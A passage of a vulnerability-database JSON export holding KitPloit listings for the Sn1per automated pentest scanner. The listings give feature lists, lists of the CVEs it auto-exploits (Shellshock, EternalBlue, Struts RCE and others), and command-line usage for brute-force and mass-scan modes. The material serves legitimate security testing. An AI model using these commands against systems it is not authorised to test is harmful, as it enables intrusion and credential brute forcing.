false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-11-24T12:43:00", "id": "KITPLOIT:8672599587089685905", "href": "http://www.kitploit.com/2018/11/sn1per-v60-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-04T15:31:27", "description": "[](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n**DEMO VIDEO:** \n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Apache Jakarta RCE CVE-2017-5638\n * Shellshock GNU Bash RCE CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin File Disclosure CVE-2006-3392\n * [Anonymous FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCE's\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp &amp; 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-07-05T13:45:00", "type": "kitploit", "title": "Sn1per v5.0 - Automated Pentest Recon Scanner", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-07-05T13:45:01", "id": "KITPLOIT:7835941952769002973", "href": "http://www.kitploit.com/2018/07/sn1per-v50-automated-pentest-recon.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-04T15:30:45", "description": "[](<https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner> \"automated scanner\" ) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test> \"penetration test\" ) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ).\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s1600/Sn1per_10.png>)\n\n \n**Detailed host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s1600/Sn1per_11.png>)\n\n \n**NMap HTML host reports** \n \n\n\n[](<https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s1600/Sn1per_13.png>)\n\n \n**Takeovers and Email Security** \n \n\n\n[](<https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s1600/Sn1per_14.png>)\n\n \n**HTML5 Notepad** \n \n\n\n[](<https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s1600/Sn1per_15.png>)\n\n \n**ORDER SN1PER PROFESSIONAL:** \nTo obtain a Sn1per Professional license, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ). \n \n**DEMO VIDEO:** \n \n \n\n\n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>)\n\n \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**EXPLOITS:** \n\n\n * Drupal RESTful Web Services unserialize() SA-CORE-2019-003\n * Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts\n * Drupal: CVE-2018-7600: [Remote Code Execution](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) \\- SA-CORE-2018-002\n * GPON Routers - Authentication Bypass / [Command Injection](<https://www.kitploit.com/search/label/Command%20Injection> \"Command Injection\" ) CVE-2018-10561\n * MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption\n * Apache Tomcat: Remote Code Execution (CVE-2017-12617)\n * Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805)\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269\n * ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249\n * Shellshock Bash Shell remote code execution CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387)\n * Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843\n * MS08-067 Microsoft Server Service Relative Path Stack Corruption\n * Webmin File Disclosure CVE-2006-3392\n * VsFTPd 2.3.4 Backdoor\n * ProFTPd 1.3.3C Backdoor\n * MS03-026 Microsoft RPC DCOM Interface Overflow\n * DistCC Daemon Command Execution\n * JBoss Java De-Serialization\n * HTTP Writable Path PUT/DELETE File Access\n * Apache Tomcat User Enumeration\n * Tomcat Application Manager Login Bruteforce\n * Jenkins-CI Enumeration\n * HTTP WebDAV Scanner\n * Android Insecure ADB\n * Anonymous FTP Access\n * PHPMyAdmin Backdoor\n * PHPMyAdmin Auth Bypass\n * OpenSSH User Enumeration\n * LibSSH Auth Bypass\n * SMTP User Enumeration\n * Public NFS Mounts\n \n**KALI LINUX INSTALL:** \n\n \n \n bash install.sh\n\n \n**UBUNTU/DEBIAN/PARROT INSTALL:** \n\n \n \n bash install_debian_ubuntu.sh\n\n \n**DOCKER INSTALL:** \n\n \n \n docker build Dockerfile\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE\n sniper -t|--target <TARGET> -o|--osint -re|--recon -fp|--fullportonly -b|--bruteforce\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] FLYOVER MODE\n sniper -t|--target <TARGET> -m|--mode flyover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TA RGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT HTTP MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT HTTPS MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] WEBSCAN MODE\n sniper -t|--target <TARGET> -m|--mode webscan\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] LOOT REIMPORTALL FUNCTION\n sniper -w <WORKSPACE_ALIAS& gt; --reimportall\n \n [*] DELETE WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -d\n \n [*] DELETE HOST FROM WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh\n \n [*] SCHEDULED SCANS'\n sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly'\n \n [*] SCAN STATUS\n sniper --status\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **FLYOVER:** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly).\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp &amp; 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **WEBSCAN:** Launches a full HTTP &amp; HTTPS web application scan against via Burpsuite and Arachni.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per](<https://github.com/1N3/Sn1per> \"Download Sn1per\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-05-12T13:09:00", "type": "kitploit", "title": "Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2015-8249", "CVE-2017-10271", "CVE-2017-12617", "CVE-2017-5638", "CVE-2017-7269", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-11776", "CVE-2018-7600"], "modified": "2019-05-12T13:09:05", "id": "KITPLOIT:7013881512724945934", "href": "http://www.kitploit.com/2019/05/sn1per-v70-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}